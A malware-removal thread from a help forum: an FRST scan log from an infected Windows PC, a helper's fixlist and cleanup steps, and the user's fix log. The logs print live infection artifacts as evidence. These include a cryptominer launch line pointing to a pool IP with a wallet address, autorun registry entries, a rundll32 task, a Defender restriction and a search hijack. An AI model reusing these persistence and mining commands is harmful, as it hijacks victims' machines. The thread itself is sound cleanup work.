2017-04-15 18:07 - 2015-09-28 21:26 - 000936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2016-11-07 02:21 - 2017-10-10 17:05 - 001267136 ____C () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-04-24 16:07 - 2016-04-24 16:07 - 000094672 ____C () C:\Program Files\TortoiseSVN\bin\libsasl.dll
2016-11-27 09:55 - 2016-11-27 09:55 - 000230064 ____C () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2017-03-18 12:58 - 2017-03-18 12:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 12:59 - 2017-03-18 18:31 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-11-11 18:02 - 2017-11-11 18:02 - 000087552 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-11-11 18:02 - 2017-11-11 18:02 - 000206336 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-11-11 18:02 - 2017-11-11 18:02 - 025461760 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-11-06 21:02 - 2017-11-06 21:02 - 002552832 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\skypert.dll
2017-11-11 18:02 - 2017-11-11 18:02 - 000685056 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\RtmMvrUap.dll
2017-11-15 19:06 - 2017-11-10 01:57 - 004135768 ____C () C:\Program Files (x86)\Google\Chrome\Application\62.0.3202.94\libglesv2.dll
2017-11-15 19:06 - 2017-11-10 01:57 - 000100184 ____C () C:\Program Files (x86)\Google\Chrome\Application\62.0.3202.94\libegl.dll
2017-11-21 00:22 - 2017-11-21 00:22 - 000713216 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
2015-03-26 16:05 - 2015-03-26 16:05 - 000014336 _____ () C:\Users\Jpoch\jagexcache\jagexlauncher\bin\JagexLauncher.exe
2017-04-15 18:07 - 2017-11-21 00:22 - 000034960 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-04-15 18:07 - 2015-09-28 21:26 - 000104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2016-11-07 02:21 - 2017-10-10 17:05 - 001040320 ____C () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-11-21 00:22 - 2017-11-21 00:22 - 000013312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\_isetup\_isdecmp.dll
2017-11-21 00:22 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\itdownload.dll
2016-11-07 02:22 - 2017-10-10 17:05 - 070805952 ____C () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2017-10-28 03:03 - 2017-11-17 15:36 - 000101888 _____ () C:\Program Files (x86)\RuneMate\.install4j\i4jinst.dll
2011-11-10 16:35 - 2011-11-10 16:35 - 003198464 _____ () C:\Users\Jpoch\jagexcache\jagexlauncher\bin\jvm.dll
2011-11-10 17:16 - 2011-11-10 17:16 - 000402944 _____ () C:\Users\Jpoch\jagexcache\jagexlauncher\bin\freetype.dll
2017-10-28 02:53 - 2017-11-21 00:25 - 000066048 ____C () C:\.jagex_cache_32\browsercontrol.dll
2017-10-28 02:54 - 2017-11-21 00:25 - 000132096 _____ () C:\Users\Jpoch\jagexcache\runescape\LIVE\jaclib.dll
2017-10-28 02:54 - 2017-11-21 00:25 - 000076288 _____ () C:\Users\Jpoch\jagexcache\runescape\LIVE\jagdx.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2016-11-07 01:05 - 2017-11-19 02:50 - 000001251 ____C C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img2.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [UDP Query User{E92F6F8F-76D2-4DE4-91F8-6144868393F9}C:\users\jpoch\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jpoch\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{D2B5BD76-C654-4A51-AA48-4ED135F3B1E4}C:\users\jpoch\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jpoch\appdata\roaming\spotify\spotify.exe
FirewallRules: [{941458AE-8A64-48D9-B837-092B4AE13236}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{24A53FF3-DD27-4347-9C96-FCCB5E4D6D81}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{A2EA45C8-52CE-4732-B24F-436E7B45C7C4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EC76A41C-3A04-410C-BDA5-2274793183BB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{0BD640A7-41C9-4E70-BFD1-2AF0EB2EBF0B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{53AA577E-403E-43FF-ABE0-F6186DECBB48}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{3AC71C5D-AD36-4BD3-A8FE-C6A1A7C8D816}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{D899C28A-E295-461C-A346-F26DC725158D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{0D93EA6C-BE64-4E57-9E32-755D84E08A5F}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{78CCC814-6A8F-4552-9CD3-935A409A9749}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{06A76B4E-5704-4196-AEB1-E2B56A20F4F8}C:\users\jpoch\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jpoch\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{6E201D26-95CF-4A4D-B469-FB9246A297FE}C:\users\jpoch\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jpoch\appdata\roaming\spotify\spotify.exe
FirewallRules: [{5F93178E-25A5-466F-AB9E-10B9D25B4A3B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{42D616D8-A42F-451B-981D-549D4A3408FD}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DC88156E-5C5C-497D-8EE8-D09E1EC849A4}C:\users\jpoch\downloads\downloader_diablo2_enus.exe] => (Allow) C:\users\jpoch\downloads\downloader_diablo2_enus.exe
FirewallRules: [UDP Query User{CCFD1587-166A-4200-A69D-A9066C2A6A31}C:\users\jpoch\downloads\downloader_diablo2_enus.exe] => (Allow) C:\users\jpoch\downloads\downloader_diablo2_enus.exe
FirewallRules: [TCP Query User{E43D4D56-C8CD-4E58-82F1-E7B91485E23A}C:\minionapp\minionapp.exe] => (Allow) C:\minionapp\minionapp.exe
FirewallRules: [UDP Query User{F03180DA-E440-4149-B784-0A41A4C2B40A}C:\minionapp\minionapp.exe] => (Allow) C:\minionapp\minionapp.exe
FirewallRules: [TCP Query User{7A9CB362-D351-4166-8F58-C5295F9CA517}C:\users\jpoch\jagexcache\jagexlauncher\bin\jagexlauncher.exe] => (Allow) C:\users\jpoch\jagexcache\jagexlauncher\bin\jagexlauncher.exe
FirewallRules: [UDP Query User{C17832A5-F222-4348-8ED5-5CA67B299BCF}C:\users\jpoch\jagexcache\jagexlauncher\bin\jagexlauncher.exe] => (Allow) C:\users\jpoch\jagexcache\jagexlauncher\bin\jagexlauncher.exe
FirewallRules: [{972ED9BF-251D-4F1A-BC67-E905CC7C2773}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{7D925423-B978-4B9F-B007-E7F81DE7A0A8}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{1E4F6292-2DB1-4284-AA51-88690F4AB9EC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{212D9828-F84A-4066-873B-836E93A1F61B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{580AD25B-E74C-4E64-80D6-DB0208170C18}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{12FF7A32-ED2A-4D4D-BBC4-8EF4292C6684}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{1AD2AD0C-BC3F-4154-A2A6-221D02EE75B1}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{833A7BC6-B3F9-4E80-9EC8-6F13E659FB86}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{75B2FB30-CD1C-4DA8-8F22-E2F903C14D59}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{BC9EE228-0710-4023-B05B-B3B20A467E33}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{53E96D9F-3D99-43FD-B4B4-6A579459F34D}] => (Allow) C:\Windows\System32\rundll32.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/21/2017 12:10:12 AM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/21/2017 12:10:12 AM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/21/2017 12:10:05 AM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/21/2017 12:10:05 AM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/20/2017 09:25:13 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/20/2017 09:25:13 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/20/2017 09:25:06 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/20/2017 09:25:06 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/19/2017 03:08:28 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "WmiApRpl" in DLL "C:\WINDOWS\system32\wbem\wmiaprpl.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
 
Error: (11/19/2017 03:08:28 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: Windows cannot load the extensible counter DLL rdyboost. The first four bytes (DWORD) of the Data section contains the Windows error code.
 
 
System errors:
=============
Error: (11/21/2017 12:22:12 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The CldFlt service failed to start due to the following error: 
The request is not supported.
 
Error: (11/20/2017 10:00:09 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The CldFlt service failed to start due to the following error: 
The request is not supported.
 
Error: (11/20/2017 09:05:24 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The CldFlt service failed to start due to the following error: 
The request is not supported.
 
Error: (11/20/2017 09:03:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA LocalSystem Container service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 8000 milliseconds: Restart the service.
 
Error: (11/20/2017 09:03:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA Display Container LS service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 5000 milliseconds: Restart the service.
 
Error: (11/20/2017 09:03:20 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The SQL Server VSS Writer service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (11/20/2017 09:03:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA Telemetry Container service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 1000 milliseconds: Restart the service.
 
Error: (11/20/2017 09:03:20 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The ASUS Com Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (11/20/2017 09:00:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA LocalSystem Container service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 6000 milliseconds: Restart the service.
 
Error: (11/20/2017 09:00:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA Display Container LS service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 1000 milliseconds: Restart the service.
 
 
CodeIntegrity:
===================================
  Date: 2017-11-20 23:51:34.374
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2017-11-20 22:46:31.419
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2017-11-20 20:42:09.736
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2017-11-20 19:25:24.177
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.
 
  Date: 2017-11-20 19:25:24.088
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.
 
  Date: 2017-11-19 14:01:46.713
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2017-09-30 15:40:38.652
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
 
  Date: 2017-09-30 15:40:35.928
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
 
  Date: 2017-08-26 20:59:03.982
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
 
  Date: 2017-08-26 20:58:59.589
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-4790 CPU @ 3.60GHz
Percentage of memory in use: 55%
Total physical RAM: 8135.07 MB
Available physical RAM: 3590.27 MB
Total Virtual: 11975.07 MB
Available Virtual: 6333.87 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:118.46 GB) (Free:11.93 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:931.51 GB) (Free:776.24 GB) NTFS
Drive e: (Win7HP_SP1_64b) (CDROM) (Total:3.11 GB) (Free:0 GB) CDFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 2D14B794)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 119.2 GB) (Disk ID: 21CC4F22)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=118.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
 
==================== End of Addition.txt ============================

#2 nasdaq

nasdaq

  • Malware Response Team
  • 40,238 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:04:33 AM

Posted 21 November 2017 - 10:11 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

ATTENTION: System Restore is disabled
Turn System Restore On for Drives in Windows 10
http://www.tenforums.com/tutorials/4533-system-protection-turn-off-drives-windows-10-a.html
===

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
(T@@9MGBSB) C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe
( ) C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\TGVYNP5FI0Z.EXE
() C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
(1) C:\Program Files\P4B69KW31G\P4B69KW31.exe
(T@@9MGBSB) C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe
(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe
(T@@9MGBSB) C:\Program Files\LVN8W6E40P\LVN8W6E40.exe
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
HKLM-x32\...\Run: [BOOSTER] => "C:\Users\Jpoch\AppData\Local\PCBooster\booster.exe" -o 188.42.242.221:3333 -u 49YfoE2xWHG1vywX2xTV8XZzBzB1E2QHEF9GtzPKSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C -p WORKER-64-1411 -k -o p (the data entry has 200 more characters).
HKLM\...\RunOnce: [OMEWPRODUCT_A4ZTJ] => C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE [422400 2017-11-20] (T@@9MGBSB) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [1GTGLIO7OYX9UG4] => C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [7571555] => C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\tgvynp5fi0z.exe [529932 2017-11-20] ( )
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [8AXDS40R0VLOMTA] => C:\Program Files\P4B69KW31G\P4B69KW31.exe [840192 2017-11-20] (1)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [ADVOFKIWWU.EXE] => C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe m_1 L_1 <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [LJ3X92T3371CP84] => C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [O6FW1NSS4KFJQRH] => C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Y680XDWS6L0I742] => C:\Program Files\LVN8W6E40P\LVN8W6E40.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [CVAWYW1XG38Q8N7] => C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe [669696 2017-11-21] (LZDZ3UY)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\MountPoints2: {514308f6-a4ca-11e6-ac7b-806e6f6e6963} - "E:\setup.exe"
CHR DefaultSearchURL: Profile 1 -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Profile 1 -> hxxp://srch.bar/?s={searchTerms}
CHR Extension: (Quick Searcher v16.2) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR Extension: (Chrome Cleaner Pro) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccjleegmemocfpghkhpjmiccjcacackp [2017-10-11]
CHR Extension: (Quick Searcher) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR HKLM\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3446151218-491997262-3667861278-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
S1 ZAM; \??\C:\WINDOWS\System32\drivers\zam64.sys [X]
Task: {8AE9CBEE-77EE-45AE-B980-A68EF2B5F072} - System32\Tasks\Yaminguict Explorer for ERC => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll",eWMujhpWxRLj <==== ATTENTION
2017-11-20 23:50 - 2017-11-20 23:50 - 002249216 _____ () C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll
2017-11-21 00:22 - 2017-11-21 00:22 - 000713216 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
2017-11-21 00:22 - 2017-11-21 00:22 - 000013312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\_isetup\_isdecmp.dll
2017-11-21 00:22 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\itdownload.dll
C:\Windows\System32\Tasks\Yaminguict Explorer for ERC
C:\Program Files (x86)\1cqaldhh1t4
C:\Program Files\U9K03QV4LJ
C:\Program Files\8OK3IXWMOC
C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy
C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp
C:\Program Files\P4B69KW31G
C:\Program Files\9F8KN5EJ25
C:\Program Files (x86)\1cqaldhh1t4
C:\Program Files\LVN8W6E40P
C:\Program Files\U9K03QV4LJ
C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt); please post it in your reply.
===

Please download Malwarebytes Anti-Malware from here
  • Right-click on the MBAM icon and select Run as administrator to run the tool.
  • Click Yes to accept any security warnings that may appear.
  • Once the MBAM dashboard opens, on the right detail pane click on the word "Current" under the Scan Status to update the tool database.
  • On the left menu pane click the Settings tab, and then select the Protection tab on the top.
  • Under the Scan Options, turn on the button Scan for rootkits and Scan within archives.
  • Click the Scan tab on the right detail pane, select Threat Scan and click the Start Scan button.
  • Note: The scan may take some time to finish, so please be patient.
  • If potential threats are detected, make sure all the listed items are checked, and click the Quarantine Selected button.
  • While still on the Scan tab, click the View Report button, and in the window that opens click the Export button, select Text file (*.txt), and save the log to your Desktop.
  • The log can also be viewed by clicking the log to select it, then clicking the View Report button.
Please post the log for my review.

Note: If asked to restart the computer, please do so immediately.
===

Reset the browsers that you use and that have been compromised.

How To:
https://www.howtogeek.com/171924/how-to-reset-your-web-browser-to-its-default-settings/

====

Please post the logs and let me know what problem persists.

#3 Description

Description
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  • Local time:03:33 AM

Posted 21 November 2017 - 03:43 PM

Thank you nasdaq. I really do appreciate your time and help through this!

I also ran malware last night after I made this post (sorry if I wasn't supposed to, but I kept getting pop-ups that would bring the screen up front and would disrupt what I was doing - had to do something).

System Restore turned on (thank you for that, no clue how it was even turned off).

Also, going to reset the browsers, but is there anything else I would need to get them to show up on the search bar again?

Fix result of Farbar Recovery Scan Tool (x64) Version: 19-11-2017
Ran by Jpoch (21-11-2017 12:28:08) Run:1
Running from C:\Users\Jpoch\Downloads\FRST
Loaded Profiles: Jpoch (Available Profiles: defaultuser0 & Jpoch)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
 
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
 
(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
(T@@9MGBSB) C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe
( ) C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\TGVYNP5FI0Z.EXE
() C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
(1) C:\Program Files\P4B69KW31G\P4B69KW31.exe
(T@@9MGBSB) C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe
(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe
(T@@9MGBSB) C:\Program Files\LVN8W6E40P\LVN8W6E40.exe
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
HKLM-x32\...\Run: [BOOSTER] => "C:\Users\Jpoch\AppData\Local\PCBooster\booster.exe" -o 188.42.242.221:3333 -u 49YfoE2xWHG1vywX2xTV8XZzBzB1E2QHEF9GtzPKSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C -p WORKER-64-1411 -k -o p (the data entry has 200 more characters).
HKLM\...\RunOnce: [OMEWPRODUCT_A4ZTJ] => C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE [422400 2017-11-20] (T@@9MGBSB) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
